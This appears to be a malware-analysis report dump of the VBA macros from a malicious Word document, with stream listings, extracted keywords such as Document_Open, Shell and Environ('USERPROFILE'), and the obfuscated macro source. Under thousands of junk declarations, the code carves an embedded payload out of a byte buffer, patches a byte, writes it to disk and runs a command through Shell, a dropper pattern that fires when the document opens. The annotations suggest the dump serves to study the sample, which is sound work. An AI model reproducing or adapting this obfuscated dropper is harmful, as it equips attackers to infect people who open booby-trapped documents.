                    ' never declared (e.g. W6GKF) are implicit Variants holding Empty; the module has no Option Explicit.
                    Dim HMDxF As Long
                    HMDxF = (381 / 353) / 30
                    Dim UbUB4 As Byte
                    UbUB4 = 137
                    Dim Ih7m7 As Long
                    Ih7m7 = (619 + 960) / 6
                    Dim ZGxe7 As String
                    ZGxe7 = "DzVR8"
                    Dim KsIBn(31 To 213) As String
                    KsIBn(31) = W6GKF
                    Dim WSn2h(27 To 32) As String
                    WSn2h(27) = Xbh0h
                    Dim NjUS4 As Byte
                    Dim DeD6w As Long
                    DeD6w = (567 / 165) - 46
                    Dim Lt5qg(95) As Byte
                    Lt5qg(95) = 197
                    Dim P6p0K As Byte
                    Dim JgRHa(88) As Byte
                    JgRHa(88) = 174
                    Dim AB3T3 As Long
                    AB3T3 = (-35 + 980) + 48
                    Dim QOhqa(21 To 327) As String
                    QOhqa(21) = ZGVT4
                    Dim Vl18Z As Long
                    Vl18Z = (395 - 767) + 28
                    Dim SBC3y(13 To 237) As Long
                    SBC3y(13) = (588 / 887) + 38
                    Dim PhO70 As Byte
                    PhO70 = 17
                    Dim TEe28 As Long
                    TEe28 = (528 - 713) / 45
                    Dim Emnh5(28 To 342) As Long
                    Emnh5(28) = (-322 + 695) + 4
                    Dim Jn7t4 As String
                    Jn7t4 = S8SxT
                    Dim Ag7HR As Byte
                    Ag7HR = 247
                    Dim D11C8(79) As Byte
                    D11C8(79) = 159
                    Dim KrjXB As String
                    KrjXB = IZy5i
                    Dim HHYU8(99) As Byte
                    HHYU8(99) = 88
                    Dim D60Tw(23 To 237) As Long
                    D60Tw(23) = (-371 / 438) + 48
                    Dim QRXmn(57) As Byte
                    QRXmn(57) = 165
                    Dim O42h2(90) As Byte
                    O42h2(90) = 13
                    Dim Ha1Oz As Byte
                    Dim GFRR5(7 To 493) As Long
                    GFRR5(7) = (949 + 872) / 23
                    Dim Cw05K(44) As Byte
                    Cw05K(44) = 62
                    Dim FkN4O As Long
                    FkN4O = (342 + 529) / 43
                    Dim Gu8Xe() As Byte ' Operative: output buffer, sized by the ReDim below
                    Dim YVJIa(1 To 100) As String
                    YVJIa(1) = "W6v4x"
                    Dim J1GIt(12 To 196) As String
                    J1GIt(12) = "CY3m7"
                    Dim RBnS3(27 To 62) As Long
                    RBnS3(27) = (61 + 535) + 2
                    Dim CHr22 As String
                    CHr22 = "R452k"
                    Dim MXWMF As String
                    MXWMF = Jm1cs
                    Dim VC8p1 As Byte
                    Dim Zz0vc As String
                    Zz0vc = ZOaK2
                    Dim I07BM As Byte
                    I07BM = 23
                    Dim C5VD1(8) As Byte
                    C5VD1(8) = 160
                    Dim V203p As Long
                    V203p = (973 - 135) / 21
                    Dim GwNDK(0 To 1) As Long
                    GwNDK(0) = (961 / 78) + 41
                    Dim Ez2bF As Byte
                    Dim Q8D6s(16 To 384) As String
                    Q8D6s(16) = R3bh6
                    ' Operative: an ADODB.Stream is created, opened and written to, but it is never saved or closed;
                    ' the output file is produced by the Open/Put/Close statements further down instead.
                    With CreateObject("adodb.stream")
                    Dim NEZVw As String
                    NEZVw = R828O
                    Dim J43u7 As Long
                    J43u7 = (-384 - 743) / 43
                    Dim T5s85 As Byte
                    Dim SX1Vo As Long
                    SX1Vo = (-431 / 148) + 3
                    Dim AItjD(7 To 334) As String
                    AItjD(7) = "GOUC2"
                    Dim H8U51(10 To 433) As String
                    H8U51(10) = "OXkdT"
                    Dim F7SOQ(18 To 489) As Long
                    F7SOQ(18) = (126 / 963) / 32
                    Dim B1ptR(92) As Byte
                    B1ptR(92) = 254
                    Dim B1E7i As Long
                    B1E7i = (-451 + 601) - 3
                    Dim LuC6X(27 To 180) As String
                    LuC6X(27) = "T10VB"
                    Dim Inz8x(25 To 73) As Long
                    Inz8x(25) = (460 + 21) / 11
                    Dim Dykvf As Byte
                    Dim UsEEv As Byte
                    Dim J3IU5 As String
                    J3IU5 = UrlR1
                    Dim FJCT0 As String
                    FJCT0 = Ac5W6
                    Dim TbR8V(1 To 147) As String
                    TbR8V(1) = "Y7745"
                    Dim EHPw0(15 To 212) As Long
                    EHPw0(15) = (-341 - 426) / 20
                    Dim DVnJi(27 To 477) As String
                    DVnJi(27) = "GzOjv"
                    Dim NW6p8 As Byte
                    Dim D6h37 As Byte
                    Dim FwIFb(79) As Byte
                    FwIFb(79) = 119
                    Dim JA4xm As String
                    JA4xm = "UmDpA"
                    Dim T2V7i(21 To 68) As Long
                    T2V7i(21) = (684 / 734) - 13
                    Dim Gnay3(7 To 104) As Long
                    Gnay3(7) = (572 + 784) - 18
                    Dim W7K57 As Byte
                    Dim M3P4t As Long
                    M3P4t = (-7 - 600) + 8
                    Dim EZD6g(46) As Byte
                    EZD6g(46) = 99
                    Dim E0ArF As Byte
                    Dim K0u3O(26 To 100) As Long
                    K0u3O(26) = (858 / 645) + 16
                    Dim JAt20(26) As Byte
                    JAt20(26) = 2
                    Dim GH7R6(11) As Byte
                    GH7R6(11) = 100
                    Dim Q1Z8R(80) As Byte
                    Q1Z8R(80) = 38
                    Dim S8f8P As Long
                    S8f8P = (633 - 582) - 27
                    Dim QDpZG As Long
                    QDpZG = (-383 + 777) / 49
                    Dim I3cWu As Byte
                    I3cWu = 228
                    Dim D60h2 As Byte
                    D60h2 = 254
                    Dim R4246 As Byte
                    Dim ByhT5(9 To 255) As Long
                    ByhT5(9) = (-309 + 243) - 8
                    .Type = 1 ' adTypeBinary
                    Dim M70t5(18 To 283) As Long
                    M70t5(18) = (-363 / 874) + 8
                    Dim QcItR As Byte
                    QcItR = 82
                    Dim PErd4(66) As Byte
                    PErd4(66) = 46
                    Dim RJD57(53) As Byte
                    RJD57(53) = 96
                    Dim UdLIC(3 To 256) As String
                    UdLIC(3) = Jzed2
                    Dim T0t5u(95) As Byte
                    T0t5u(95) = 61
                    Dim TE2BA As String
                    TE2BA = WHhbG
                    Dim A05tr As Long
                    A05tr = (87 - 563) - 1
                    Dim QVj2A(1 To 414) As String
                    QVj2A(1) = L50h6
                    Dim FF0qk(17) As Byte
                    FF0qk(17) = 212
                    Dim J2Oo7(30 To 446) As String
                    J2Oo7(30) = "YB32w"
                    .Open
                    Dim F6e0j As Byte
                    F6e0j = 23
                    Dim VpzpC(42) As Byte
                    VpzpC(42) = 199
                    .Write FW5Vg ' the input bytes go into the in-memory stream only; nothing is flushed to disk here
                    Dim URyPU(4 To 360) As Long
                    URyPU(4) = (418 / 242) / 45
                    Ez2bF = 169 ' Operative: used both as extra buffer size and as the patch byte below
                    Dim Lx3y2(0 To 1) As String
                    Lx3y2(0) = "Dw75W"
                    Dim PBnGN As String
                    PBnGN = "PhHn0"
                    Dim O0tFy(20 To 168) As Long
                    O0tFy(20) = (-397 + 444) - 48
                    Dim LGp6q As Long
                    LGp6q = (984 / 460) / 11
                    Dim BV1ha As String
                    BV1ha = "V8qkI"
                    Dim WrA2d(15 To 252) As String
                    WrA2d(15) = SbxRg
                    ReDim Gu8Xe(UBound(FW5Vg) + Ez2bF) ' Operative: output buffer = input length + 169
                    Dim OEP8X As Long
                    OEP8X = (-499 / 36) + 18
                    Dim NCPvi As String
                    NCPvi = SgThF
                    Dim Yrt6o As String
                    Yrt6o = "J8IL7"
                    Dim I6LL6(10 To 52) As String
                    I6LL6(10) = "DD0qd"
                    Dim JZMjI As Byte
                    JZMjI = 29
                    Dim QwoJ8 As String
                    QwoJ8 = "Iundr"
                    Dim MS04Q As Byte
                    MS04Q = 47
                    Dim KPnWw As Long
                    KPnWw = (-728 - 812) - 37
                    Dim Bj6FC As String
                    Bj6FC = "QXHK6"
                    Dim UyUCU As Byte
                    Dim L88zU As Byte
                    L88zU = 113
                    Dim SpFgy(22) As Byte
                    SpFgy(22) = 68
                    Dim Cdqbn As String
                    Cdqbn = L4k6Z
                    Dim H0XK7 As String
                    H0XK7 = AJQF4
                    Dim M7Bio(22 To 27) As String
                    M7Bio(22) = DQZ20
                    Dim HXSQn(31 To 147) As String
                    HXSQn(31) = Ft8Bk
                    Dim U5HU6(30 To 303) As String
                    U5HU6(30) = "YK22i"
                    Dim Y7pvu As Byte
                    Dim Cj68m(91) As Byte
                    Cj68m(91) = 191
                    ZQcI5 = 62792
                    ' Operative: copy the input from offset 62792 to its end into the start of Gu8Xe,
                    ' i.e. the first 62792 bytes of FW5Vg are discarded.
                    For V3a1w = 62792 To UBound(FW5Vg)
                    Qq73S = Eb3be
                    MmLPO = SYbzA
                    FFBfg = B4bP1
                    ADOq8 = 132 ' Operative: index of the byte patched after the loop
                    J302e = I2sZr
                    Z48wG = VvZ0F
                    Gu8Xe(V3a1w - 62792) = FW5Vg(V3a1w)
                    C14e5 = QKBEp
                    V30b8 = RdHtR
                    Next
                    Dim DkEHg(34 To 166) As Long
                    DkEHg(34) = (-189 / 422) + 28
                    Dim YapM0(14 To 40) As Long
                    YapM0(14) = (-28 / 364) / 42
                    Dim TkHQU(32 To 420) As String
                    TkHQU(32) = "XuidR"
                    Dim J74kH(2 To 21) As Long
                    J74kH(2) = (-575 / 154) - 2
                    Dim QRDfP(21 To 171) As Long
                    QRDfP(21) = (-754 / 673) - 5
                    Dim T368b(19) As Byte
                    T368b(19) = 27
                    Gu8Xe(ADOq8) = Ez2bF ' Operative: byte 132 of the output buffer is overwritten with 169
                    Dim WF687 As String
                    WF687 = X5D63
                    Dim NxyRH As Byte
                    NxyRH = 74
                    Dim RLxl1 As String
                    RLxl1 = "X6wh0"
                    Open Oj62U For Binary As #6 ' Operative: the buffer is written to the path passed in Oj62U
                    Dim Z87Cn(90) As Byte
                    Z87Cn(90) = 82
                    Put #6, , Gu8Xe
                    Dim NEX75(11 To 150) As String
                    NEX75(11) = "EHw60"
                    Dim Mu7id(24 To 263) As String
                    Mu7id(24) = ZdOQk
                    Dim TxsAb(7 To 37) As Long
                    TxsAb(7) = (-258 + 208) / 4
                    Dim S8bLT As Byte
                    S8bLT = 253
                    Dim Crs4A(18 To 228) As Long
                    Crs4A(18) = (535 + 57) - 12
                    Dim FzI6j(8) As Byte
                    FzI6j(8) = 244
                    Dim IAJgk As String
                    IAJgk = "M88Xk"
                    Dim QQ3P0 As String
                    QQ3P0 = DW7qw
                    Dim Rquv5 As Long
                    Rquv5 = (677 + 286) - 48
                    Dim S6p26 As String
                    S6p26 = AC4wm
                    Dim OpjqX(25) As Byte
                    OpjqX(25) = 77
                    Dim O66TD As String
                    O66TD = SkX5n
                    Close #6
                    Dim WpIoU(14 To 265) As Long
                    WpIoU(14) = (-869 - 90) + 2
                    Dim MkkVn(38) As Byte
                    MkkVn(38) = 28
                    Dim Pa3K2(25 To 233) As Long
                    Pa3K2(25) = (-434 + 189) - 32
                    Dim K7iv6(21 To 490) As String
                    K7iv6(21) = K6Lww
                    Dim NUIv4(7 To 14) As Long
                    NUIv4(7) = (576 - 62) / 34
                    Dim AbK61 As Byte
                    Dim WV2q6(21 To 281) As Long
                    WV2q6(21) = (-641 + 415) + 20
                    Dim O0302(8 To 390) As String
                    O0302(8) = J7ie0
                    Dim Q88WO As Long
                    Q88WO = (-652 + 702) + 43
                    Dim QH5Gc As String
                    QH5Gc = "LMP6t"
                    Dim URwC7 As Long
                    URwC7 = (-974 - 272) + 25
                    Dim GZUB0 As Byte
                    Dim T5F8J As String
                    T5F8J = Ic1Eh
                    Dim H7U0t As Byte
                    H7U0t = 185
                    Dim E01G7 As Byte
                    End With
                    Dim M4G2b(37) As Byte
                    M4G2b(37) = 21
                    Dim Hmja5(16 To 115) As Long
                    Hmja5(16) = (604 + 348) - 23
                    Dim Yq4b6 As String
                    Yq4b6 = "PA7En"
                    Dim Lrxr4 As Long
                    Lrxr4 = (-948 / 663) / 1
                    Dim A3kNR As Long
                    A3kNR = (-405 / 871) - 34
                    Dim L6X4W(29) As Byte
                    L6X4W(29) = 246
                    Dim H4vCl As Byte
                    Dim SnR7P As Long
                    SnR7P = (883 - 960) / 32
                    Dim EA77f As Byte
                    Dim Ba0su(25 To 216) As Long
                    Ba0su(25) = (645 - 996) / 7
                    Dim GRZ8p(17 To 42) As String
                    GRZ8p(17) = DEOo8
                    Dim G50D0 As Long
                    G50D0 = (414 + 157) - 3
                    Dim E1p3y As String
                    E1p3y = M0huq
                    Dim Q80xi As String
                    Q80xi = E40L2
                    Dim BvUd1(9 To 133) As Long
                    BvUd1(9) = (-959 + 284) / 9
                    Dim O85R8 As Long
                    O85R8 = (314 - 759) - 2
                    Dim Atdh3 As Byte
                    Atdh3 = 0
                    Dim E4yc5 As Long
                    E4yc5 = (-166 / 740) - 48
                    Dim I8KSQ(12 To 17) As String
                    I8KSQ(12) = "JmTzx"
                    Dim IR4K2 As Long
                    IR4K2 = (-658 + 63) - 19
                    Dim PfM2W As Byte
                    PfM2W = 160
                    Dim Z0ejl As Long
                    Z0ejl = (-733 - 497) - 46
                    Dim D306l As String
                    D306l = DBJaS
                    Dim PDT56(97) As Byte
                    PDT56(97) = 231
                    Dim EdbfP As Byte
                    EdbfP = 74
                    Dim C5yy5(28) As Byte
                    C5yy5(28) = 161
                    Dim GcRAS As Byte
                    Dim OI0H3 As String
                    OI0H3 = Hf724
                    Dim WBD52(20 To 47) As String
                    WBD52(20) = LGvtQ
                    Dim X3k4t(4 To 447) As String
                    X3k4t(4) = "Zo6UE"
                    Dim Q2Q4P As Long
                    Q2Q4P = (823 - 402) + 5
                    Dim E03Yb(20 To 27) As Long
                    E03Yb(20) = (-275 + 970) + 27
                    Dim A1P3f(11 To 100) As String
                    A1P3f(11) = OkaWA
                    Dim UHd6q(1) As Byte
                    UHd6q(1) = 183
                    Dim XDTN8(28 To 36) As String
                    XDTN8(28) = JrPYW
                    Dim PueOR As Byte
                    PueOR = 176
                    Dim E52jB(31 To 232) As String
                    E52jB(31) = F6kH3
                    Dim PR1Kt As Long
                    PR1Kt = (667 - 260) - 22
                    Dim McG7w As Byte
                    Dim IuY2U(25) As Byte
                    IuY2U(25) = 90
                    Dim A8XHS(9 To 62) As String
                    A8XHS(9) = Hf7hK
                    Dim D5NeH As Long
                    D5NeH = (-480 / 928) + 8
                    Dim Z0C28 As Byte
                    Z0C28 = 121
                    Dim DzJf7 As Long
                    DzJf7 = (215 + 99) / 4
                    Dim IM6UA(2 To 268) As Long
                    IM6UA(2) = (-397 / 517) / 17
                    Dim TJ2Ep As String
                    TJ2Ep = "OvD2n"
                    Dim SJnW2 As String
                    SJnW2 = "BNFSv"
                    Dim HEffn(95) As Byte
                    HEffn(95) = 174
                    Dim Tv8vb As Byte
                    Dim JQNt7 As Long
                    JQNt7 = (147 / 453) + 27
                    Dim K3GL0(23 To 255) As Long
                    K3GL0(23) = (887 - 65) + 43
                    Dim CL270(33 To 308) As String
                    CL270(33) = "OJ4L1"
                    Dim WL7v3(1 To 73) As Long
                    WL7v3(1) = (209 - 283) - 16
                    Dim Q5AZ7(9 To 473) As Long
                    Q5AZ7(9) = (-166 / 532) + 41
                    Dim CE6wW As String
                    CE6wW = "Vs33Z"
                    Dim DPxT7 As Byte
                    Dim DSDr0(49) As Byte
                    DSDr0(49) = 191
                    Dim Q0MEh(55) As Byte
                    Q0MEh(55) = 82
                    Dim Qe281(74) As Byte
                    Qe281(74) = 74
                    Dim Ayi03 As Byte
                    Dim SLS3C As Long
                    SLS3C = (977 - 967) / 7
                    Dim C4pL6(0 To 1) As String
                    C4pL6(0) = "JqSOJ"
                    End Sub
                    Public Sub sh1(KAJuJ)
                    ' Same filler pattern as test1; the listing of this procedure continues past the end of this section.
                    Dim STI26 As Byte
                    Dim A0xHM(26 To 369) As String
                    A0xHM(26) = DQRn4
                    Dim Q1sr5 As String
                    Q1sr5 = ZQ451
                    Dim Y3smw(20 To 313) As Long
                    Y3smw(20) = (138 + 109) - 48
                    Dim I3yT0 As String
                    I3yT0 = ME4k5
                    Dim LjSQB As String
                    LjSQB = VAhvE
                    Dim A4zLH As Byte
                    A4zLH = 0
                    Dim TsQ3h As Byte
                    Dim CoanH As Byte
                    CoanH = 221
                    Dim I1V6d As Long
                    I1V6d = (137 / 362) - 19
                    Dim L07b0(3 To 329) As Long
                    L07b0(3) = (-288 - 699) / 32
                    Dim LHC85 As String
                    LHC85 = "LYC2N"
                    Dim VQDRI As String
                    VQDRI = MeKE6
                    Dim T5PPC As Byte
                    Dim U2B0a(9 To 186) As Long
                    U2B0a(9) = (-955 + 123) - 14
                    Dim XCgdc As Byte
                    Dim Zt0dT As Byte
                    Dim PLg3l(48) As Byte
                    PLg3l(48) = 13
                    Dim RpE5C As Byte
                    Dim WmXR7 As String
                    WmXR7 = Mav4d
                    Dim JCCHw As String
                    JCCHw = "BqdZA"
                    Dim I78AF As Byte
                    Dim LE5S0(84) As Byte
                    LE5S0(84) = 227
                    Dim YNSD0 As String
                    YNSD0 = "C4dm6"
                    Dim BRt8w(14 To 447) As Long
                    BRt8w(14) = (-410 - 969) - 47
                    Dim J6FpP(96) As Byte
                    J6FpP(96) = 30
                    Dim KjvOJ(98) As Byte
                    KjvOJ(98) = 143
                    Dim XbFDT(12) As Byte
                    XbFDT(12) = 91
                    Dim PJUqj As Byte
                    Dim G3Gzt(5 To 45) As Long
                    G3Gzt(5) = (728 / 168) + 5
                    Dim DB0b8(2 To 141) As Long
                    DB0b8(2) = (-96 + 875) + 49
                    Dim Rq3H3 As Long
                    Rq3H3 = (-705 - 628) - 47
                    Dim Ew4iZ As Long
                    Ew4iZ = (789 - 851) + 44
                    Dim MUF8J(97) As Byte
                    MUF8J(97) = 164
                    Dim Y3uBE(23 To 476) As Long
                    Y3uBE(23) = (-145 + 749) / 8
                    Dim Mz6eO As Long
                    Mz6eO = (859 / 602) + 7
                    Dim G35S1 As Byte
                    Dim O2gTH(0) As Byte
                    O2gTH(0) = 148
                    Dim D4H7v As Byte
                    D4H7v = 80
                    Dim S0lpP As String
                    S0lpP = Iz1S7
                    Dim J886S As Byte
                    Dim GB7LY As Long
                    GB7LY = (237 + 801) - 27
                    Dim PkcLo As String
                    PkcLo = ZQ3QJ
                    Dim K0633 As Byte
                    Dim J5j4c(7 To 91) As String
                    
                    J5j4c(7) = "Ig7uA"
                    
                    Dim HdY8v As Long
                    
                    HdY8v = (154 - 193) - 20
                    
                    Dim J61Ot As Byte
                    
                    Dim J2HgG(30 To 488) As String
                    
                    J2HgG(30) = "PRe2L"
                    
                    Dim NRd6k As Long
                    
                    NRd6k = (294 / 34) + 48
                    
                    Shell KAJuJ
                    
                    Dim WE8cz(1 To 363) As Long
                    
                    WE8cz(1) = (545 + 700) / 25
                    
                    Dim Lptm3 As Byte
                    
                    Lptm3 = 26
                    
                    Dim Eb7fK As String
                    
                    Eb7fK = Igu02
                    
                    Dim ZA7Yw(16 To 306) As Long
                    
                    ZA7Yw(16) = (-27 + 139) - 18
                    
                    End Sub
                    VBA File Name: Module1.bas, Stream Size: 675
                    General
                    Stream Path:VBA/Module1
                    VBA File Name:Module1.bas
                    Stream Size:675

                    VBA Code Keywords

                    Keyword
                    Attribute
                    VB_Name
                    VBA Code
                    Attribute VB_Name = "Module1"
                    VBA File Name: ThisDocument.cls, Stream Size: 42215
                    General
                    Stream Path:VBA/ThisDocument
                    VBA File Name:ThisDocument.cls
                    Stream Size:42215

                    VBA Code Keywords

                    Keyword
                    JJzIB
                    False
                    OMLpT
                    VB_GlobalNameSpace
                    "RUtlW"
                    Binary
                    Sijqv
                    VB_Exposed
                    AjSXV
                    CStr(Environ("USERPROFILE"))
                    IVOcx
                    ZIGAQ
                    "SvjJX"
                    "RNvYF"
                    NJWek
                    Pvtdr
                    TxHCo
                    LTFyB
                    KRfkL
                    VB_Customizable
                    NoDON
                    VB_Creatable
                    "HIdCG"
                    AfOpe
                    UlBiv
                    XBsOm
                    "R_O"
                    TyTNz
                    UbRVW
                    SJAPn
                    .Type
                    VB_Name
                    Environ("NUMB"
                    "DyjxX"
                    GBdyo
                    "\text.doc"
                    .Write
                    Public
                    ReDim
                    "RVvYR"
                    "HfFAf"
                    Resume
                    HZibc
                    BIXuv
                    EqDjd
                    "FXzug"
                    FWyLu
                    "EQoob"
                    Shell
                    Bpabn
                    VB_Base
                    Dvhoi
                    WcTgf
                    JiIyy
                    VWgRj
                    .Open
                    DKNai
                    ZQQNT
                    "CtDSH"
                    NGKGP
                    ICvSv
                    VB_TemplateDerived
                    XSppB
                    LKlOJ
                    MvykX
                    BnmDS
                    QHGsD
                    BxYtT
                    Document_Open()
                    NAnEu
                    QPyeV
                    CySUV
                    LBzBN
                    String
                    ZmoPt
                    "SSORS")
                    CreateObject("adodb.stream")
                    "ThisDocument"
                    "LBfNF"
                    PqAkQ
                    "_PR"
                    "IAqLs"
                    UDtTh
                    "OCE"
                    XmCnj
                    Error
                    EyMnI
                    Attribute
                    BHzgp
                    VB_PredeclaredId
                    Close
                    LKbGd
                    JOHVE
                    VZLVx
                    OQhFY
                    "HOqcN"
                    VBA Code
                    Attribute VB_Name = "ThisDocument"
                    
                    Attribute VB_Base = "1Normal.ThisDocument"
                    
                    Attribute VB_GlobalNameSpace = False
                    
                    Attribute VB_Creatable = False
                    
                    Attribute VB_PredeclaredId = True
                    
                    Attribute VB_Exposed = True
                    
                    Attribute VB_TemplateDerived = True
                    
                    Attribute VB_Customizable = True
                    
                    Public Sub test1(SG07j, B78Bz)
                    
                    Dim Z6Vtd(2 To 270) As Long
                    
                    Z6Vtd(2) = (-921 / 17) + 27
                    
                    Dim XxCry(21 To 252) As String
                    
                    XxCry(21) = "RNvYF"
                    
                    Dim L16Ns As Long
                    
                    L16Ns = (513 / 647) / 21
                    
                    Dim T3o6C(29 To 50) As String
                    
                    T3o6C(29) = JiIyy
                    
                    Dim WPY5a As String
                    
                    WPY5a = I70P3
                    
                    Dim T6DRG(68) As Byte
                    
                    T6DRG(68) = 167
                    
                    Dim FY4tj As String
                    
                    FY4tj = "Dv1Sx"
                    
                    Dim JySvd(5 To 441) As Long
                    
                    JySvd(5) = (622 - 749) / 16
                    
                    Dim HVgMV(40) As Byte
                    
                    HVgMV(40) = 173
                    
                    Dim Dlv68(15 To 195) As String
                    
                    Dlv68(15) = "YH3V8"
                    
                    Dim NAnEu As Long
                    
                    NAnEu = (928 + 537) - 5
                    
                    Dim Uq8X3 As Byte
                    
                    Uq8X3 = 213
                    
                    Dim AH5LQ(15 To 88) As String
                    
                    AH5LQ(15) = HZibc
                    
                    Dim Hj50H(11 To 422) As Long
                    
                    Hj50H(11) = (-40 / 551) - 42
                    
                    Dim MYcw1(20 To 237) As String
                    
                    MYcw1(20) = BcLv2
                    
                    Dim BP33O(3 To 416) As String
                    
                    BP33O(3) = "VW6JF"
                    
                    Dim N18dI As Byte
                    
                    N18dI = 106
                    
                    Dim YrDH8 As Long
                    
                    YrDH8 = (-855 + 784) + 44
                    
                    Dim OQhFY As Byte
                    
                    Dim BO00p As String
                    
                    BO00p = "Qh343"
                    
                    Dim WDJUU(6 To 221) As String
                    
                    WDJUU(6) = "HOqcN"
                    
                    Dim KG8wK(34 To 115) As String
                    
                    KG8wK(34) = "MFxd6"
                    
                    Dim ZIGAQ As Long
                    
                    ZIGAQ = (-962 / 370) - 2
                    
                    Dim YfY6A As String
                    
                    YfY6A = "FXzug"
                    
                    Dim I265X As Long
                    
                    I265X = (-478 - 33) - 23
                    
                    Dim J0G42 As String
                    
                    J0G42 = C0Vfq
                    
                    Dim O15AO As String
                    
                    O15AO = BxYtT
                    
                    Dim F5Yo4 As Byte
                    
                    Dim DKNai As String
                    
                    DKNai = OhAx1
                    
                    Dim SJAPn As Long
                    
                    SJAPn = (830 + 762) / 20
                    
                    Dim ZU5MU(27) As Byte
                    
                    ZU5MU(27) = 233
                    
                    Dim Dvhoi As Long
                    
                    Dvhoi = (576 - 590) / 15
                    
                    Dim Iu0ef(10 To 101) As String
                    
                    Iu0ef(10) = NzkP8
                    
                    Dim Ayt2P As String
                    
                    Ayt2P = "RVvYR"
                    
                    Dim HNP0B(30 To 296) As Long
                    
                    HNP0B(30) = (432 / 20) + 14
                    
                    Dim DGhXX(9 To 17) As Long
                    
                    DGhXX(9) = (644 + 448) + 14
                    
                    Dim Ghtv5 As Long
                    
                    Ghtv5 = (-356 - 236) / 34
                    
                    Dim EZgIt(14 To 475) As String
                    
                    EZgIt(14) = Eg1q6
                    
                    Dim K17RU(9 To 380) As Long
                    
                    K17RU(9) = (-316 / 906) + 7
                    
                    Dim B205R As String
                    
                    B205R = F2gVH
                    
                    Dim XM7np(29 To 194) As String
                    
                    XM7np(29) = LKbGd
                    
                    Dim JEh0y(0 To 1) As String
                    
                    JEh0y(0) = G1jcm
                    
                    Dim J5wcd As String
                    
                    J5wcd = "DyjxX"
                    
                    Dim NcEED(16 To 206) As Long
                    
                    NcEED(16) = (724 - 146) + 40
                    
                    Dim PddFF(76) As Byte
                    
                    PddFF(76) = 185
                    
                    Dim Z7v0Q As String
                    
                    Z7v0Q = GE8D2
                    
                    Dim PG21j As String
                    
                    PG21j = CySUV
                    
                    Dim ZLXC1 As Byte
                    
                    Dim T0G6r(7 To 356) As String
                    
                    T0G6r(7) = "MaI72"
                    
                    Dim CF1sh(88) As Byte
                    
                    CF1sh(88) = 12
                    
                    Dim M4BLO(4 To 28) As Long
                    
                    M4BLO(4) = (359 - 415) + 44
                    
                    Dim Fw3vH As Long
                    
                    Fw3vH = (247 + 589) + 41
                    
                    Dim RTkJ0() As Byte
                    
                    Dim It8ni As Long
                    
                    It8ni = (-302 + 50) / 39
                    
                    Dim GM1v5 As Long
                    
                    GM1v5 = (972 + 796) - 26
                    
                    Dim CEWgw(28 To 303) As String
                    
                    CEWgw(28) = "D1cCH"
                    
                    Dim Pvtdr As String
                    
                    Pvtdr = W8fJH
                    
                    Dim DE05S As String
                    
                    DE05S = "SvjJX"
                    
                    Dim DypKj(11 To 126) As Long
                    
                    DypKj(11) = (-480 + 784) / 22
                    
                    Dim A0ylA As Byte
                    
                    Dim LH7Q1 As Long
                    
                    LH7Q1 = (-724 - 128) - 11
                    
                    Dim V7YP1 As Byte
                    
                    Dim Gb6x8 As Long
                    
                    Gb6x8 = (297 - 57) - 10
                    
                    Dim AzPD7(49) As Byte
                    
                    AzPD7(49) = 60
                    
                    Dim A8MDS(2 To 139) As Long
                    
                    A8MDS(2) = (659 - 324) + 15
                    
                    Dim T4MG4 As String
                    
                    T4MG4 = D18NP
                    
                    Dim TFsn8(62) As Byte
                    
                    TFsn8(62) = 76
                    
                    Dim IVYW5(30 To 85) As String
                    
                    IVYW5(30) = RzEI8
                    
                    Dim NJWek As String
                    
                    NJWek = "Oj3p5"
                    
                    Dim UfYzs(55) As Byte
                    
                    UfYzs(55) = 132
                    
                    Dim MwE07(7) As Byte
                    
                    MwE07(7) = 201
                    
                    Dim Nr0bV As Byte
                    
                    Dim CkcpF(99) As Byte
                    
                    CkcpF(99) = 239
                    
                    Dim EZ3r3(32 To 170) As Long
                    
                    EZ3r3(32) = (162 + 950) + 25
                    
                    Dim T1GVo As Byte
                    
                    T1GVo = 151
                    
                    Dim T0ZTv As Byte
                    
                    T0ZTv = 91
                    
                    Dim AfOpe As Long
                    
                    AfOpe = (373 - 274) + 37
                    
                    Dim ZPG4y(30 To 450) As String
                    
                    ZPG4y(30) = FG8Ql
                    
                    Dim Q8mqW As Byte
                    
                    Dim Mlh44(28 To 169) As String
                    
                    Mlh44(28) = "F0B2X"
                    
                    Dim Sijqv As Byte
                    
                    Sijqv = 170
                    
                    Dim HS2f0(51) As Byte
                    
                    HS2f0(51) = 238
                    
                    Dim W8rbm As Byte
                    
                    Dim XmCnj As String
                    
                    XmCnj = Us6o1
                    
                    Dim Sq28v As Byte
                    
                    Sq28v = 89
                    
                    Dim BnmDS As Long
                    
                    BnmDS = (-28 + 623) - 35
                    
                    Dim EiyW4(25) As Byte
                    
                    EiyW4(25) = 230
                    
                    Dim UraR5(40) As Byte
                    
                    UraR5(40) = 99
                    
                    Dim PUR0v As Byte
                    
                    Dim X0m11(20 To 78) As String
                    
                    X0m11(20) = "U5H2Z"
                    
                    With CreateObject("adodb.stream")
                    
                    Dim BHzgp As Long
                    
                    BHzgp = (774 - 578) - 37
                    
                    Dim TXkcs(5 To 70) As Long
                    
                    TXkcs(5) = (439 - 488) / 37
                    
                    Dim QHGsD As Byte
                    
                    Dim BX28o(98) As Byte
                    
                    BX28o(98) = 72
                    
                    Dim W8xkN As Byte
                    
                    W8xkN = 5
                    
                    Dim TxHCo As Byte
                    
                    TxHCo = 151
                    
                    Dim ENEpV(15 To 281) As Long
                    
                    ENEpV(15) = (-211 / 473) + 40
                    
                    Dim A06q8 As String
                    
                    A06q8 = "GN253"
                    
                    Dim S248R As String
                    
                    S248R = Z2VyP
                    
                    Dim LsvZ7(18 To 331) As Long
                    
                    LsvZ7(18) = (558 / 278) - 28
                    
                    Dim G27FB(1 To 443) As Long
                    
                    G27FB(1) = (-543 - 254) / 41
                    
                    Dim Eug66(86) As Byte
                    
                    Eug66(86) = 229
                    
                    Dim Vb22q(90) As Byte
                    
                    Vb22q(90) = 183
                    
                    Dim XoaL7(14 To 275) As Long
                    
                    XoaL7(14) = (159 - 453) + 33
                    
                    Dim H1zFm(2 To 239) As String
                    
                    H1zFm(2) = "UE1iu"
                    
                    Dim Fg4l1(4 To 148) As String
                    
                    Fg4l1(4) = "IqK88"
                    
                    Dim GAF6F(28 To 166) As Long
                    
                    GAF6F(28) = (-521 - 694) - 18
                    
                    Dim Won7L(90) As Byte
                    
                    Won7L(90) = 92
                    
                    Dim KotsD(14 To 90) As Long
                    
                    KotsD(14) = (-782 - 398) - 23
                    
                    Dim Vdxb1(23 To 24) As Long
                    
                    Vdxb1(23) = (590 / 885) + 41
                    
                    Dim KTlJi(3 To 377) As Long
                    
                    KTlJi(3) = (-423 / 911) - 17
                    
                    Dim B4lhk As String
                    
